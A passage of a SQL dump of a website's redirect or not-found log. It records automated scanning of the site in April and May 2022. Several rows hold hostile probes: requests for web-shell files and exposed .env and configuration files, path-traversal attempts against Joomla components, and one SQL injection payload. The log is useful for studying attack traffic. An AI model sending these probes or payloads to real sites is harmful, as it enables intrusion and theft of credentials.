00:00:00',301),(23177,'https://ekvatorprint.com.ua/backup/license.txt',NULL,'http://ekvatorprint.com.ua/backup/license.txt','',3,0,'2022-04-12 08:13:20','0000-00-00 00:00:00',301),(23178,'https://ekvatorprint.com.ua/assets/plugins/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-12 09:51:39','0000-00-00 00:00:00',301),(23179,'https://ekvatorprint.com.ua/wp-content/themes/twentyfive/include.php',NULL,'www.google.com','',5,0,'2022-04-13 21:13:15','0000-00-00 00:00:00',301),(23180,'https://ekvatorprint.com.ua/wp/wp-content/themes/sketch/404.php',NULL,'www.google.com','',3,0,'2022-04-13 21:13:25','0000-00-00 00:00:00',301),(23181,'https://ekvatorprint.com.ua/wordpress/wp-content/themes/sketch/404.php',NULL,'www.google.com','',4,0,'2022-04-13 21:13:32','0000-00-00 00:00:00',301),(23182,'https://ekvatorprint.com.ua/blog/wp-content/themes/sketch/404.php',NULL,'www.google.com','',3,0,'2022-04-13 21:13:42','0000-00-00 00:00:00',301),(23183,'https://ekvatorprint.com.ua/site/wp-content/themes/sketch/404.php',NULL,'www.google.com','',2,0,'2022-04-13 21:13:51','0000-00-00 00:00:00',301),(23184,'https://ekvatorprint.com.ua/assets/js/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-13 23:05:14','0000-00-00 00:00:00',301),(23185,'https://ekvatorprint.com.ua/public/plugins/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-14 08:43:55','0000-00-00 00:00:00',301),(23186,'https://ekvatorprint.com.ua/991176.php',NULL,'www.google.com','',2,0,'2022-04-15 04:37:03','0000-00-00 00:00:00',301),(23187,'https://ekvatorprint.com.ua/shell20211028.php',NULL,'www.google.com','',4,0,'2022-04-15 04:37:42','0000-00-00 00:00:00',301),(23188,'https://ekvatorprint.com.ua/403.php',NULL,'www.google.com','',14,0,'2022-04-15 04:41:51','0000-00-00 00:00:00',301),(23189,'https://ekvatorprint.com.ua/wp-content/plugins/ubh/up.php/.well-known/',NULL,'www.google.com','',3,0,'2022-04-15 04:42:12','0000-00-00 00:00:00',301),(23190,'https://ekvatorprint.com.ua/wp-includes/',NULL,'www.google.com','',2,0,'2022-04-15 04:42:49','0000-00-00 00:00:00',301),(23191,'https://ekvatorprint.com.ua/wp-content/plugins/woo-product-table/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/woo-product-table/readme.txt','',1,0,'2022-04-15 11:42:08','0000-00-00 00:00:00',301),(23192,'https://ekvatorprint.com.ua/wp-content/mu-plugins-old/index.php?f=/nmrtjoujadutreqj/scrjkuhlebpzmtyo.txt',NULL,'www.bing.com','',4,0,'2022-04-15 21:47:25','0000-00-00 00:00:00',301),(23193,'https://ekvatorprint.com.ua/xmrlpc.php?daksldlkdsadas=1',NULL,'www.bing.com','',3,0,'2022-04-15 21:47:36','0000-00-00 00:00:00',301),(23194,'https://ekvatorprint.com.ua/qindex.php?daksldlkdsadas=1',NULL,'www.bing.com','',3,0,'2022-04-15 21:47:41','0000-00-00 00:00:00',301),(23195,'https://ekvatorprint.com.ua/xindex.php',NULL,'www.bing.com','',6,0,'2022-04-15 21:48:36','0000-00-00 00:00:00',301),(23196,'https://ekvatorprint.com.ua/old/license.txt',NULL,'http://ekvatorprint.com.ua/old/license.txt','',1,0,'2022-04-16 01:38:01','0000-00-00 00:00:00',301),(23197,'https://ekvatorprint.com.ua/.aws',NULL,'','',1,0,'2022-04-16 08:25:05','0000-00-00 00:00:00',301),(23198,'https://ekvatorprint.com.ua/assets/plugins/elfinder/src/connectors/php/connector.php',NULL,'','',1,0,'2022-04-16 11:26:29','0000-00-00 00:00:00',301),(23199,'https://ekvatorprint.com.ua/adminpanel/',NULL,'','',1,0,'2022-04-17 13:03:51','0000-00-00 00:00:00',301),(23200,'https://ekvatorprint.com.ua/admin/elfinder/src/connectors/php/connector.php',NULL,'','',1,0,'2022-04-18 08:12:50','0000-00-00 00:00:00',301),(23201,'https://ekvatorprint.com.ua/images.php',NULL,'','',1,0,'2022-04-18 13:32:16','0000-00-00 00:00:00',301),(23202,'https://ekvatorprint.com.ua/new/license.txt',NULL,'http://ekvatorprint.com.ua/new/license.txt','',3,0,'2022-04-19 01:46:55','0000-00-00 00:00:00',301),(23203,'https://ekvatorprint.com.ua/plugins/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-20 10:59:21','0000-00-00 00:00:00',301),(23204,'https://ekvatorprint.com.ua/)(?:\\/\\/(?:[^\\/?',NULL,'https://ekvatorprint.com.ua/','',1,0,'2022-04-20 19:51:21','0000-00-00 00:00:00',301),(23205,'https://ekvatorprint.com.ua/focusoutblur)$/,ge=/^([^.]*)(?:\\.(.+)',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:21','0000-00-00 00:00:00',301),(23206,'https://ekvatorprint.com.ua/:304===t?e=',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:21','0000-00-00 00:00:00',301),(23207,'https://ekvatorprint.com.ua/a',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:21','0000-00-00 00:00:00',301),(23208,'https://ekvatorprint.com.ua/ecma)script/i;a.clean',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:21','0000-00-00 00:00:00',301),(23209,'https://ekvatorprint.com.ua/a.mozvisibilitystate?b=',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:52','0000-00-00 00:00:00',301),(23210,'https://ekvatorprint.com.ua/aw.ds',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:52','0000-00-00 00:00:00',301),(23211,'https://ekvatorprint.com.ua/en_us.html',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:52','0000-00-00 00:00:00',301),(23212,'https://ekvatorprint.com.ua/array.prototype.keys',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:53','0000-00-00 00:00:00',301),(23213,'https://ekvatorprint.com.ua/b;a=r.google_tag_data;a.ics',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:53','0000-00-00 00:00:00',301),(23214,'https://ekvatorprint.com.ua/www.googleadservices.com',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:54','0000-00-00 00:00:00',301),(23215,'https://ekvatorprint.com.ua/google.com',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:54','0000-00-00 00:00:00',301),(23216,'https://ekvatorprint.com.ua/r.location.port)',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:55','0000-00-00 00:00:00',301),(23217,'https://ekvatorprint.com.ua/google.tagmanager.debugui2.queue',NULL,'https://ekvatorprint.com.ua/','',2,0,'2022-04-20 19:51:55','0000-00-00 00:00:00',301),(23218,'https://ekvatorprint.com.ua/assets/admin/plugins/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-21 19:09:16','0000-00-00 00:00:00',301),(23219,'https://ekvatorprint.com.ua/tmp/evil.php',NULL,'','',11,0,'2022-04-22 02:28:37','0000-00-00 00:00:00',301),(23220,'https://ekvatorprint.com.ua/images/stories/evil.php',NULL,'','',10,0,'2022-04-22 02:28:40','0000-00-00 00:00:00',301),(23221,'https://ekvatorprint.com.ua/components/com_sexycontactform/fileupload/files/evil.php',NULL,'','',4,0,'2022-04-22 02:28:41','0000-00-00 00:00:00',301),(23222,'https://ekvatorprint.com.ua/tmp/evil.php.xxxjpg',NULL,'','',3,0,'2022-04-22 02:28:41','0000-00-00 00:00:00',301),(23223,'https://ekvatorprint.com.ua/components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../configuration.php',NULL,'','',4,0,'2022-04-22 02:28:42','0000-00-00 00:00:00',301),(23224,'https://ekvatorprint.com.ua/index.php?option=com_macgallery&view=download&albumid=../../../configuration.php',NULL,'','',5,0,'2022-04-22 02:28:43','0000-00-00 00:00:00',301),(23225,'https://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/evil.php',NULL,'','',3,0,'2022-04-22 02:28:44','0000-00-00 00:00:00',301),(23226,'https://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../evil.php',NULL,'','',5,0,'2022-04-22 02:28:44','0000-00-00 00:00:00',301),(23227,'https://ekvatorprint.com.ua/components/com_b2jcontact/evil.php',NULL,'','',5,0,'2022-04-22 02:28:44','0000-00-00 00:00:00',301),(23228,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/evil.php',NULL,'','',2,0,'2022-04-22 02:28:45','0000-00-00 00:00:00',301),(23229,'https://ekvatorprint.com.ua/wp-includes/js/zxcvbn-async.min.js',NULL,'','',1,0,'2022-04-22 09:29:17','0000-00-00 00:00:00',301),(23230,'https://ekvatorprint.com.ua/deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php = >> shell no work',NULL,'','',2,0,'2022-04-23 00:17:48','0000-00-00 00:00:00',301),(23231,'https://ekvatorprint.com.ua/wp-admin/deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php = >> shell no work',NULL,'','',2,0,'2022-04-23 00:17:50','0000-00-00 00:00:00',301),(23232,'https://ekvatorprint.com.ua/wp-content/deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php = >> shell no work',NULL,'','',2,0,'2022-04-23 00:17:51','0000-00-00 00:00:00',301),(23233,'https://ekvatorprint.com.ua/0byte.php',NULL,'','',6,0,'2022-04-23 00:17:55','0000-00-00 00:00:00',301),(23234,'https://ekvatorprint.com.ua/sym.php',NULL,'','',2,0,'2022-04-23 00:17:58','0000-00-00 00:00:00',301),(23235,'https://ekvatorprint.com.ua/sym403.php',NULL,'','',4,0,'2022-04-23 00:17:59','0000-00-00 00:00:00',301),(23236,'https://ekvatorprint.com.ua/xl.php',NULL,'','',6,0,'2022-04-23 00:18:01','0000-00-00 00:00:00',301),(23237,'https://ekvatorprint.com.ua/symlink.php',NULL,'','',2,0,'2022-04-23 00:18:03','0000-00-00 00:00:00',301),(23238,'https://ekvatorprint.com.ua/i.php',NULL,'','',7,0,'2022-04-23 00:18:59','0000-00-00 00:00:00',301),(23239,'https://ekvatorprint.com.ua/p.php',NULL,'','',5,0,'2022-04-23 01:04:27','0000-00-00 00:00:00',301),(23240,'https://ekvatorprint.com.ua/q.php',NULL,'','',5,0,'2022-04-23 01:04:28','0000-00-00 00:00:00',301),(23241,'https://ekvatorprint.com.ua/g.php',NULL,'','',5,0,'2022-04-23 01:04:35','0000-00-00 00:00:00',301),(23242,'https://ekvatorprint.com.ua/h.php',NULL,'','',5,0,'2022-04-23 01:04:36','0000-00-00 00:00:00',301),(23243,'https://ekvatorprint.com.ua/j.php',NULL,'','',1,0,'2022-04-23 01:04:38','0000-00-00 00:00:00',301),(23244,'https://ekvatorprint.com.ua/l.php',NULL,'','',5,0,'2022-04-23 01:04:41','0000-00-00 00:00:00',301),(23245,'https://ekvatorprint.com.ua/v.php',NULL,'','',5,0,'2022-04-23 01:04:46','0000-00-00 00:00:00',301),(23246,'https://ekvatorprint.com.ua/n.php',NULL,'','',5,0,'2022-04-23 01:04:48','0000-00-00 00:00:00',301),(23247,'https://ekvatorprint.com.ua/wp-wso.php',NULL,'','',1,0,'2022-04-23 01:04:53','0000-00-00 00:00:00',301),(23248,'https://ekvatorprint.com.ua/priv8.php',NULL,'','',5,0,'2022-04-23 01:04:54','0000-00-00 00:00:00',301),(23249,'https://ekvatorprint.com.ua/minimo.php',NULL,'','',3,0,'2022-04-23 01:04:56','0000-00-00 00:00:00',301),(23250,'https://ekvatorprint.com.ua/www.php',NULL,'','',3,0,'2022-04-23 01:05:01','0000-00-00 00:00:00',301),(23251,'https://ekvatorprint.com.ua/100.php',NULL,'','',5,0,'2022-04-23 01:05:02','0000-00-00 00:00:00',301),(23252,'https://ekvatorprint.com.ua/777.php',NULL,'','',3,0,'2022-04-23 01:05:04','0000-00-00 00:00:00',301),(23253,'https://ekvatorprint.com.ua/xox.php',NULL,'','',1,0,'2022-04-23 01:05:07','0000-00-00 00:00:00',301),(23254,'https://ekvatorprint.com.ua/new.php',NULL,'','',5,0,'2022-04-23 01:05:09','0000-00-00 00:00:00',301),(23255,'https://ekvatorprint.com.ua/wi.php',NULL,'','',1,0,'2022-04-23 01:05:10','0000-00-00 00:00:00',301),(23256,'https://ekvatorprint.com.ua/mar.php',NULL,'','',5,0,'2022-04-23 01:05:12','0000-00-00 00:00:00',301),(23257,'https://ekvatorprint.com.ua/nee.php',NULL,'','',1,0,'2022-04-23 01:05:15','0000-00-00 00:00:00',301),(23258,'https://ekvatorprint.com.ua/lol.php',NULL,'','',1,0,'2022-04-23 01:05:18','0000-00-00 00:00:00',301),(23259,'https://ekvatorprint.com.ua/87.php',NULL,'','',1,0,'2022-04-23 01:05:20','0000-00-00 00:00:00',301),(23260,'https://ekvatorprint.com.ua/haxor.php',NULL,'','',5,0,'2022-04-23 01:05:24','0000-00-00 00:00:00',301),(23261,'https://ekvatorprint.com.ua/foxwsov1.php',NULL,'','',1,0,'2022-04-23 01:05:28','0000-00-00 00:00:00',301),(23262,'https://ekvatorprint.com.ua/if.php',NULL,'','',1,0,'2022-04-23 01:05:37','0000-00-00 00:00:00',301),(23263,'https://ekvatorprint.com.ua/kk.php',NULL,'','',4,0,'2022-04-23 01:05:39','0000-00-00 00:00:00',301),(23264,'https://ekvatorprint.com.ua/mrjn.php',NULL,'','',1,0,'2022-04-23 01:05:41','0000-00-00 00:00:00',301),(23265,'https://ekvatorprint.com.ua/kn.php',NULL,'','',1,0,'2022-04-23 01:05:42','0000-00-00 00:00:00',301),(23266,'https://ekvatorprint.com.ua/3301.php',NULL,'','',1,0,'2022-04-23 01:05:44','0000-00-00 00:00:00',301),(23267,'https://ekvatorprint.com.ua/alex.php',NULL,'','',3,0,'2022-04-23 01:05:47','0000-00-00 00:00:00',301),(23268,'https://ekvatorprint.com.ua/mailer.php',NULL,'','',3,0,'2022-04-23 01:05:49','0000-00-00 00:00:00',301),(23269,'https://ekvatorprint.com.ua/anone.php',NULL,'','',1,0,'2022-04-23 01:05:50','0000-00-00 00:00:00',301),(23270,'https://ekvatorprint.com.ua/wp-ad.php',NULL,'','',1,0,'2022-04-23 01:05:53','0000-00-00 00:00:00',301),(23271,'https://ekvatorprint.com.ua/send.php',NULL,'','',3,0,'2022-04-23 01:05:55','0000-00-00 00:00:00',301),(23272,'https://ekvatorprint.com.ua/.wp-cache.php',NULL,'','',1,0,'2022-04-23 01:05:57','0000-00-00 00:00:00',301),(23273,'https://ekvatorprint.com.ua/sendmail.php',NULL,'','',3,0,'2022-04-23 01:05:59','0000-00-00 00:00:00',301),(23274,'https://ekvatorprint.com.ua/rahma.php',NULL,'','',1,0,'2022-04-23 01:06:00','0000-00-00 00:00:00',301),(23275,'https://ekvatorprint.com.ua/nasgor.php',NULL,'','',1,0,'2022-04-23 01:06:02','0000-00-00 00:00:00',301),(23276,'https://ekvatorprint.com.ua/wp-confirm.php',NULL,'','',1,0,'2022-04-23 01:06:04','0000-00-00 00:00:00',301),(23277,'https://ekvatorprint.com.ua/alfa123.php',NULL,'','',1,0,'2022-04-23 01:06:05','0000-00-00 00:00:00',301),(23278,'https://ekvatorprint.com.ua/wp-one.php',NULL,'','',1,0,'2022-04-23 01:06:10','0000-00-00 00:00:00',301),(23279,'https://ekvatorprint.com.ua/alexus.php',NULL,'','',3,0,'2022-04-23 01:06:12','0000-00-00 00:00:00',301),(23280,'https://ekvatorprint.com.ua/wso1337.php',NULL,'','',1,0,'2022-04-23 01:06:14','0000-00-00 00:00:00',301),(23281,'https://ekvatorprint.com.ua/php.php',NULL,'','',2,0,'2022-04-23 04:06:07','0000-00-00 00:00:00',301),(23282,'https://ekvatorprint.com.ua/dev/license.txt',NULL,'http://ekvatorprint.com.ua/dev/license.txt','',2,0,'2022-04-23 08:22:08','0000-00-00 00:00:00',301),(23283,'https://ekvatorprint.com.ua/admin/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-23 11:25:06','0000-00-00 00:00:00',301),(23284,'https://ekvatorprint.com.ua/application/config/sms_settings.php',NULL,'','',32,0,'2022-04-23 22:31:30','0000-00-00 00:00:00',301),(23285,'https://ekvatorprint.com.ua/application/config/s3.php',NULL,'','',32,0,'2022-04-23 22:31:32','0000-00-00 00:00:00',301),(23286,'https://ekvatorprint.com.ua/app/config/.env',NULL,'','',31,0,'2022-04-23 22:31:37','0000-00-00 00:00:00',301),(23287,'https://ekvatorprint.com.ua/api/public/.env',NULL,'','',2,0,'2022-04-24 05:49:34','0000-00-00 00:00:00',301),(23288,'https://ekvatorprint.com.ua/new/.env',NULL,'','',2,0,'2022-04-24 05:49:45','0000-00-00 00:00:00',301),(23289,'https://ekvatorprint.com.ua/wp-includes/class-wp-page-icon.php',NULL,'','',3,0,'2022-04-24 19:36:03','0000-00-00 00:00:00',301),(23290,'https://ekvatorprint.com.ua/0aoxnvguiqubqdgspi3duwc6u',NULL,'','',1,0,'2022-04-25 10:48:48','0000-00-00 00:00:00',301),(23291,'https://ekvatorprint.com.ua/assets/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-25 13:50:36','0000-00-00 00:00:00',301),(23292,'https://ekvatorprint.com.ua/a/license.txt',NULL,'http://ekvatorprint.com.ua/a/license.txt','',2,0,'2022-04-26 07:20:49','0000-00-00 00:00:00',301),(23293,'https://ekvatorprint.com.ua/admin/elfinder/php/connector.minimal.php',NULL,'','',2,0,'2022-04-26 13:35:32','0000-00-00 00:00:00',301),(23294,'https://ekvatorprint.com.ua/comment/api/index.php?gid=1&page=2&rlist[]=@`\'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(202072102)))),@`\'`',NULL,'http://ekvatorprint.com.ua/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`','',1,0,'2022-04-29 08:55:46','0000-00-00 00:00:00',301),(23295,'https://ekvatorprint.com.ua/admin/elfinder/php/connector.php',NULL,'','',1,0,'2022-04-29 14:32:51','0000-00-00 00:00:00',301),(23296,'https://ekvatorprint.com.ua/blog/mt/mt-xmlrpc.cgi',NULL,'','',1,0,'2022-04-30 10:45:33','0000-00-00 00:00:00',301),(23297,'https://ekvatorprint.com.ua/cgi/mt/mt-xmlrpc.cgi',NULL,'','',1,0,'2022-04-30 10:45:33','0000-00-00 00:00:00',301),(23298,'https://ekvatorprint.com.ua/assets/js/elfinder/php/connector.php',NULL,'','',1,0,'2022-05-01 01:23:33','0000-00-00 00:00:00',301),(23299,'https://ekvatorprint.com.ua/admin/assets/plugins/elfinder/php/connector.php',NULL,'','',1,0,'2022-05-02 13:31:12','0000-00-00 00:00:00',301),(23300,'https://ekvatorprint.com.ua/config',NULL,'','',1,0,'2022-05-03 08:08:31','0000-00-00 00:00:00',301),(23301,'https://ekvatorprint.com.ua/settings.json',NULL,'','',1,0,'2022-05-03 08:08:32','0000-00-00 00:00:00',301),(23302,'https://ekvatorprint.com.ua/php.ini',NULL,'','',1,0,'2022-05-03 08:08:32','0000-00-00 00:00:00',301),(23303,'https://ekvatorprint.com.ua/settings.php',NULL,'','',1,0,'2022-05-03 08:08:34','0000-00-00 00:00:00',301),(23304,'https://ekvatorprint.com.ua/new/wp-content/themes/sketch/404.php',NULL,'','',1,0,'2022-05-04 01:02:04','0000-00-00 00:00:00',301),(23305,'https://ekvatorprint.com.ua/test/wp-content/themes/sketch/404.php',NULL,'','',1,0,'2022-05-04 01:02:08','0000-00-00 00:00:00',301),(23306,'https://ekvatorprint.com.ua/old/wp-content/themes/sketch/404.php',NULL,'','',1,0,'2022-05-04 01:02:12','0000-00-00 00:00:00',301),(23307,'https://ekvatorprint.com.ua/backup/wp-content/themes/sketch/404.php',NULL,'','',1,0,'2022-05-04 01:02:15','0000-00-00 00:00:00',301),(23308,'https://ekvatorprint.com.ua/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:02:42','0000-00-00 00:00:00',301),(23309,'https://ekvatorprint.com.ua/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:02:46','0000-00-00 00:00:00',301),(23310,'https://ekvatorprint.com.ua/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:02:50','0000-00-00 00:00:00',301),(23311,'https://ekvatorprint.com.ua/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:03:19','0000-00-00 00:00:00',301),(23312,'https://ekvatorprint.com.ua/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:03:23','0000-00-00 00:00:00',301),(23313,'https://ekvatorprint.com.ua/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:03:28','0000-00-00 00:00:00',301),(23314,'https://ekvatorprint.com.ua/wp-content/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:03:41','0000-00-00 00:00:00',301),(23315,'https://ekvatorprint.com.ua/wp-content/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:03:49','0000-00-00 00:00:00',301),(23316,'https://ekvatorprint.com.ua/wp-content/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:03:58','0000-00-00 00:00:00',301),(23317,'https://ekvatorprint.com.ua/wp-content/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:04:03','0000-00-00 00:00:00',301),(23318,'https://ekvatorprint.com.ua/wp-content/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:04:08','0000-00-00 00:00:00',301),(23319,'https://ekvatorprint.com.ua/wp-content/alfa_data/alfacgiapi/wp-content/uploads/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:04:13','0000-00-00 00:00:00',301),(23320,'https://ekvatorprint.com.ua/wp-content/alfa_data/alfacgiapi/wp-content/uploads/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:04:22','0000-00-00 00:00:00',301),(23321,'https://ekvatorprint.com.ua/wp-content/alfa_data/alfacgiapi/wp-content/uploads/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:04:29','0000-00-00 00:00:00',301),(23322,'https://ekvatorprint.com.ua/wp-content/alfa_data/alfacgiapi/wp-content/uploads/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:04:38','0000-00-00 00:00:00',301),(23323,'https://ekvatorprint.com.ua/wp-content/alfa_data/alfacgiapi/wp-content/uploads/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:04:42','0000-00-00 00:00:00',301),(23324,'https://ekvatorprint.com.ua/wp-content/alfa_data/alfacgiapi/wp-content/uploads/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:04:45','0000-00-00 00:00:00',301),(23325,'https://ekvatorprint.com.ua/wp-content/uploads/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:05:06','0000-00-00 00:00:00',301),(23326,'https://ekvatorprint.com.ua/wp-content/uploads/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:05:14','0000-00-00 00:00:00',301),(23327,'https://ekvatorprint.com.ua/wp-content/uploads/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:05:19','0000-00-00 00:00:00',301),(23328,'https://ekvatorprint.com.ua/wp-content/uploads/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:05:22','0000-00-00 00:00:00',301),(23329,'https://ekvatorprint.com.ua/wp-content/plugins/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:05:26','0000-00-00 00:00:00',301),(23330,'https://ekvatorprint.com.ua/wp-content/plugins/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:05:33','0000-00-00 00:00:00',301),(23331,'https://ekvatorprint.com.ua/wp-content/plugins/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:05:42','0000-00-00 00:00:00',301),(23332,'https://ekvatorprint.com.ua/wp-content/plugins/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:05:49','0000-00-00 00:00:00',301),(23333,'https://ekvatorprint.com.ua/wp-content/plugins/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:05:53','0000-00-00 00:00:00',301),(23334,'https://ekvatorprint.com.ua/wp-content/plugins/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:05:57','0000-00-00 00:00:00',301),(23335,'https://ekvatorprint.com.ua/wp-content/plugins/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:06:01','0000-00-00 00:00:00',301),(23336,'https://ekvatorprint.com.ua/wp-content/plugins/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:06:09','0000-00-00 00:00:00',301),(23337,'https://ekvatorprint.com.ua/wp-content/plugins/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:06:17','0000-00-00 00:00:00',301),(23338,'https://ekvatorprint.com.ua/wp-content/plugins/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:06:26','0000-00-00 00:00:00',301),(23339,'https://ekvatorprint.com.ua/wp-content/plugins/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:06:29','0000-00-00 00:00:00',301),(23340,'https://ekvatorprint.com.ua/wp-content/plugins/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:06:33','0000-00-00 00:00:00',301),(23341,'https://ekvatorprint.com.ua/wp-content/themes/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:06:37','0000-00-00 00:00:00',301),(23342,'https://ekvatorprint.com.ua/wp-content/themes/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:06:46','0000-00-00 00:00:00',301),(23343,'https://ekvatorprint.com.ua/wp-content/themes/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:06:53','0000-00-00 00:00:00',301),(23344,'https://ekvatorprint.com.ua/wp-content/themes/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:07:01','0000-00-00 00:00:00',301),(23345,'https://ekvatorprint.com.ua/wp-content/themes/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:07:05','0000-00-00 00:00:00',301),(23346,'https://ekvatorprint.com.ua/wp-content/themes/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:07:10','0000-00-00 00:00:00',301),(23347,'https://ekvatorprint.com.ua/wp-content/themes/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:07:13','0000-00-00 00:00:00',301),(23348,'https://ekvatorprint.com.ua/wp-content/themes/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:07:21','0000-00-00 00:00:00',301),(23349,'https://ekvatorprint.com.ua/wp-content/themes/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:07:29','0000-00-00 00:00:00',301),(23350,'https://ekvatorprint.com.ua/wp-content/themes/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:07:38','0000-00-00 00:00:00',301),(23351,'https://ekvatorprint.com.ua/wp-content/themes/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:07:42','0000-00-00 00:00:00',301),(23352,'https://ekvatorprint.com.ua/wp-content/themes/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:07:45','0000-00-00 00:00:00',301),(23353,'https://ekvatorprint.com.ua/wp-content/upgrade/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:07:50','0000-00-00 00:00:00',301),(23354,'https://ekvatorprint.com.ua/wp-content/upgrade/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:07:58','0000-00-00 00:00:00',301),(23355,'https://ekvatorprint.com.ua/wp-content/upgrade/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:08:08','0000-00-00 00:00:00',301),(23356,'https://ekvatorprint.com.ua/wp-content/upgrade/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:08:16','0000-00-00 00:00:00',301),(23357,'https://ekvatorprint.com.ua/wp-content/upgrade/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:08:21','0000-00-00 00:00:00',301),(23358,'https://ekvatorprint.com.ua/wp-content/upgrade/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:08:26','0000-00-00 00:00:00',301),(23359,'https://ekvatorprint.com.ua/wp-content/upgrade/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:08:31','0000-00-00 00:00:00',301),(23360,'https://ekvatorprint.com.ua/wp-content/upgrade/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:08:40','0000-00-00 00:00:00',301),(23361,'https://ekvatorprint.com.ua/wp-content/upgrade/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:08:49','0000-00-00 00:00:00',301),(23362,'https://ekvatorprint.com.ua/wp-content/upgrade/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:08:57','0000-00-00 00:00:00',301),(23363,'https://ekvatorprint.com.ua/wp-content/upgrade/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:09:02','0000-00-00 00:00:00',301),(23364,'https://ekvatorprint.com.ua/wp-content/upgrade/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:09:07','0000-00-00 